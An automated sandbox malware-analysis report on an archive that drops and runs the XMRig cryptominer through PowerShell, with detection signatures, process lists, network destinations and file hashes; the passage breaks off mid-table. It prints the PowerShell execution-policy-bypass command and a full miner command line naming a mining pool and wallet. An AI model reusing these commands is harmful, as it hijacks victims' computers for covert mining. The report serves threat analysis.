Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 00:27
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:05
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2456 wrote to memory of 4716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2456 wrote to memory of 4716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2456-1-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp
memory/2456-5-0x0000011AEE070000-0x0000011AEE092000-memory.dmp
memory/2456-6-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2456-9-0x0000011AEE220000-0x0000011AEE296000-memory.dmp
memory/2456-10-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4zik25g.mf2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2456-25-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2456-48-0x0000011AEE3A0000-0x0000011AEE3B2000-memory.dmp
memory/2456-61-0x0000011AEE060000-0x0000011AEE06A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4716-90-0x0000023433DF0000-0x0000023433E10000-memory.dmp
memory/2456-91-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp
memory/2456-93-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/4716-92-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-94-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-95-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-96-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-97-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-98-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-99-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-100-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-101-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-102-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-103-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-104-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-105-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-106-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-107-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-108-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-109-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-110-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-111-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-112-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-113-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-114-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-115-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-116-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-117-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-118-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-119-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-120-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-121-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-122-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-123-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-124-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-125-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-126-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-127-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-128-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-129-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-130-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-131-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-132-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-133-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-134-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-135-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-136-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-137-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-138-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-139-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-140-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-141-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-142-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-143-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-144-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-145-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-146-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-147-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-148-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-149-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-150-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-151-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-152-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-153-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-154-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
memory/4716-155-0x00007FF6FE580000-0x00007FF6FF1B3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3812 wrote to memory of 3908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3812 wrote to memory of 3908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.229.19:443 | tcp |
Files
memory/3812-0-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjuujoal.pbq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3812-9-0x0000018D48030000-0x0000018D48052000-memory.dmp
memory/3812-10-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/3812-11-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/3812-12-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/3812-14-0x0000018D480D0000-0x0000018D480E2000-memory.dmp
memory/3812-15-0x0000018D480C0000-0x0000018D480CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3908-46-0x000001D3E75C0000-0x000001D3E75E0000-memory.dmp
memory/3908-47-0x000001D3E7610000-0x000001D3E7630000-memory.dmp
memory/3908-48-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3812-49-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
memory/3812-50-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/3908-52-0x000001D3E7650000-0x000001D3E7670000-memory.dmp
memory/3908-51-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-53-0x000001D3E7630000-0x000001D3E7650000-memory.dmp
memory/3908-54-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-55-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-57-0x000001D3E7630000-0x000001D3E7650000-memory.dmp
memory/3908-56-0x000001D3E7650000-0x000001D3E7670000-memory.dmp
memory/3908-58-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-59-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-60-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-61-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-62-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-63-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-64-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-65-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-66-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-67-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-68-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-69-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-70-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-71-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-72-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-73-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-74-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-75-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-76-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-77-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-78-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-79-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-80-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-81-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-82-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-83-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-84-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-85-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-86-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-87-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-88-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-89-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-90-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-91-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-92-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-93-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-94-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-95-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-96-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-97-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-98-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-99-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-100-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-101-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-102-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-103-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-104-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-105-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-106-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-107-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-108-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-109-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-110-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-111-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-112-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-113-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-114-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-115-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
memory/3908-116-0x00007FF622590000-0x00007FF6231C3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:37
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
